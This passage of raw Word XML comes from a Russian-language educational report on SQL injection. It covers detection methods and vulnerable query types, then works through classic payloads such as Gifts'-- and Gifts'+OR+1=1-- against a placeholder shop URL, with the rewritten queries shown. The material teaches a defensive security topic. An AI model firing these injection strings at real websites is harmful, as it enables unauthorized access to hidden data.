    <w:p w14:paraId="199F260E" w14:textId="26C45B0B" w:rsidR="00187C9A" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve">SQL-инъекции сыграли значительную роль во многих крупных утечках данных, что привело к репутационным потерям и штрафам за нарушение норм </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:lastRenderedPageBreak/>
        <w:t>регулирования. В некоторых случаях злоумышленники могут получить долгосрочный доступ к системам, который может оставаться незамеченным в течение продолжительного времени.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E58C70" w14:textId="62497D8D" w:rsidR="00A70756" w:rsidRDefault="00A70756" w:rsidP="00A70756"/>
    <w:p w14:paraId="38627466" w14:textId="5926CEE2" w:rsidR="00A70756" w:rsidRDefault="00A70756" w:rsidP="00A70756">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc182315619"/>
      <w:r w:rsidRPr="00A70756">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Обнаружение и эксплуатация уязвимостей</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="084A0B49" w14:textId="77777777" w:rsidR="00A70756" w:rsidRDefault="00A70756" w:rsidP="00A70756"/>
    <w:p w14:paraId="1BE6B44B" w14:textId="51DC3780" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t>Для ручного обнаружения SQL-инъекций необходимо систематически тестировать каждую точку ввода данных в приложении, отправляя:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9F61C2" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve">Одинарную кавычку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'</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve"> и анализируя ошибки или аномалии в откликах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09763861" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t>SQL-синтаксис, который возвращает исходное значение точки ввода, а затем иное значение, для выявления различий в ответах приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175DA01B" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve">Булевы условия, например,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OR 1=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve"> 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OR 1=2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t>, и анализируя различия в откликах приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD3EE7E" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t>Нагрузки, вызывающие временные задержки при исполнении в SQL-запросе, и измеряя время отклика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46714AF0" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t>OAST-нагрузки для инициирования сетевого взаимодействия вне полосы (out-of-band), при исполнении в SQL-запросе, и наблюдая за такими взаимодействиями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6473190E" w14:textId="2AD148B5" w:rsidR="00187C9A" w:rsidRDefault="00187C9A" w:rsidP="004E0B23">
      <w:r w:rsidRPr="00A70756">
        <w:t>Также для быстрого и надежного обнаружения большинства уязвимостей SQL-инъекций можно использовать Burp Scanner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DF0BF0" w14:textId="77777777" w:rsidR="004E0B23" w:rsidRPr="00A70756" w:rsidRDefault="004E0B23" w:rsidP="004E0B23"/>
    <w:p w14:paraId="2E952A19" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve">Большинство уязвимостей SQL-инъекций возникает в предложении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WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve"> запроса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SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t>. Однако такие уязвимости могут проявляться в любом месте запроса и в различных типах запросов. Некоторые распространенные случаи включают:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7CBCCD" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve">-запросы с уязвимостями в обновляемых значениях или предложении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WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B63D565" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t>-запросы с уязвимостями в вставляемых значениях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFE641F" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t>-запросы с уязвимостями в именах таблиц или столбцов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D53F0C7" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve">-запросы с уязвимостями в предложении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ORDER BY</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6848AAFA" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t>Примеры SQL-инъекций</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D42ADC" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t>Существует множество уязвимостей и методов атак с использованием SQL-инъекций. Основные примеры включают:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547D254B" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t>Извлечение скрытых данных путем изменения запроса для возврата дополнительных результатов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600C933F" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t>Нарушение логики приложения, когда запрос меняется для вмешательства в логику приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D79D265" w14:textId="77777777" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve">Атаки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UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t>, позволяющие извлекать данные из других таблиц базы данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258945DC" w14:textId="3CD9DB44" w:rsidR="00187C9A" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t>«Слепые» SQL-инъекции, где результаты контролируемого запроса не отображаются в откликах приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBD9AD2" w14:textId="77777777" w:rsidR="004E0B23" w:rsidRPr="00A70756" w:rsidRDefault="004E0B23" w:rsidP="00A70756"/>
    <w:p w14:paraId="1E49C23F" w14:textId="57529782" w:rsidR="00187C9A" w:rsidRPr="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00CB262C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc182315620"/>
      <w:r w:rsidRPr="00CB262C">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00187C9A" w:rsidRPr="00CB262C">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Извлечение скрытых данных</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="0EAD9CA4" w14:textId="0F778661" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00187C9A" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t>Предположим, что в интернет-магазине отображаются товары по категориям. При выборе категории «Подарки» браузер пользователя отправляет запрос:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776AFE6B" w14:textId="4F7CF199" w:rsidR="00187C9A" w:rsidRPr="00A70756" w:rsidRDefault="00176466" w:rsidP="00A70756">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00A70756" w:rsidRPr="00A70756">
          <w:rPr>
            <w:rStyle w:val="afd"/>
          </w:rPr>
          <w:t>https://insecure-website.com/products?category=Gifts</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="37313823" w14:textId="1C0EE10D" w:rsidR="00A70756" w:rsidRPr="00A5065A" w:rsidRDefault="00A70756" w:rsidP="00A70756">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A70756">
        <w:t>Это</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t>вызывает</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t>запрос</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC7B41" w14:textId="69120532" w:rsidR="00A70756" w:rsidRPr="00A70756" w:rsidRDefault="00A70756" w:rsidP="00A70756">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> products </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> category </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'Gifts'</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> released </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735E4C37" w14:textId="509C569C" w:rsidR="00A70756" w:rsidRPr="00A70756" w:rsidRDefault="00A70756" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve">Этот запрос возвращает все товары из таблицы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products</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve">, где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category = 'Gifts'</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve"> и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released = 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve">. Ограничение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released = 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve"> скрывает товары, которые еще не выпущены. Однако отсутствие защиты от SQL-инъекций позволяет злоумышленнику выполнить атаку:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B376F1" w14:textId="15061A8F" w:rsidR="00A70756" w:rsidRPr="00A70756" w:rsidRDefault="00176466" w:rsidP="00A70756">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00A70756" w:rsidRPr="00A70756">
          <w:rPr>
            <w:rStyle w:val="afd"/>
          </w:rPr>
          <w:t>https://insecure-website.com/products?category=Gifts'--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E800E97" w14:textId="48B13984" w:rsidR="00A70756" w:rsidRPr="00A5065A" w:rsidRDefault="00A70756" w:rsidP="00A70756">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A70756">
        <w:t>Этот</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t>запрос</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t>преобразуется</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F8579E" w14:textId="798A81E3" w:rsidR="00A70756" w:rsidRPr="00A70756" w:rsidRDefault="00A70756" w:rsidP="00A70756">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> products </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> category </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'Gifts'</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--' AND released = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09563298" w14:textId="77777777" w:rsidR="00A70756" w:rsidRPr="00A70756" w:rsidRDefault="00A70756" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Здесь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--</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve"> указывает, что остальная часть запроса рассматривается как комментарий. Таким образом, условие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AND released = 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve"> игнорируется, и отображаются все товары, включая еще не выпущенные.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADFA1FF" w14:textId="77777777" w:rsidR="00A70756" w:rsidRPr="00A70756" w:rsidRDefault="00A70756" w:rsidP="00A70756">
      <w:r w:rsidRPr="00A70756">
        <w:t>Похожий запрос может быть использован для отображения всех товаров в любой категории:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A5E27E" w14:textId="2A027C60" w:rsidR="00A70756" w:rsidRPr="00A70756" w:rsidRDefault="00176466" w:rsidP="00A70756">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00A70756" w:rsidRPr="00A70756">
          <w:rPr>
            <w:rStyle w:val="afd"/>
          </w:rPr>
          <w:t>https://insecure-website.com/products?category=Gifts'+OR+1=1--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7BE41863" w14:textId="72389DB4" w:rsidR="00A70756" w:rsidRPr="00A5065A" w:rsidRDefault="00A70756" w:rsidP="00A70756">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A70756">
        <w:t>Этот</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t>запрос</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t>преобразуется</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010703CC" w14:textId="16A83137" w:rsidR="00A70756" w:rsidRPr="00A70756" w:rsidRDefault="00A70756" w:rsidP="00A70756">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> products </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> category </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'Gifts'</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="hljs-comment"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--' AND released = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D74CBA5" w14:textId="4D90CA78" w:rsidR="00A70756" w:rsidRPr="00A70756" w:rsidRDefault="00A70756" w:rsidP="00A70756">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve">Так как </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70756">
        <w:t xml:space="preserve"> всегда истинно, запрос возвращает все товары.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63987F5D" w14:textId="01C8AB8E" w:rsidR="00036090" w:rsidRDefault="00036090" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6A078F" w14:textId="64DDF739" w:rsidR="00CB262C" w:rsidRPr="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00CB262C">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc182315621"/>
      <w:r w:rsidRPr="00CB262C">
        <w:t>2.2 Извлечение данных из других таблиц базы данных</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
